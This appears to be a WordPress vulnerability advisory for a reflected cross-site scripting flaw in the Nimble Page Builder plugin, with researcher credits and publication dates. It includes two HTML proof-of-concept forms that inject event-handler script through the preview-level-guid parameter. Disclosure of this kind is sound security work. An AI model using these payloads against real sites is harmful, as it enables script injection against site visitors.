WordPress Plugin Vulnerabilities
Nimble Page Builder < 3.2.2 - Reflected Cross-Site Scripting
Description
The plugin does not sanitise and escape the preview-level-guid parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting
Proof of Concept
v < 3.1.32 <form action="http://example.com/?customize_messenger_channel" method="POST"> <input type="text" name="preview-level-guid" value='" xxx><img src onerror=alert(/XSS/)>'> <input type="submit" value="Exploit me pls" /> </form> v < 3.2.2 <form action="http://example.com/?customize_messenger_channel" method="POST"> <input type="text" name="preview-level-guid" value='" style=position:absolute;top:0;left:0;max-width:9999px;width:9999px;height:9999px onmouseover=alert(/XSS/)//'> <input type="submit" value="Exploit me pls" /> </form>
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-03-29 (about 2 years ago)
Added
2022-03-29 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)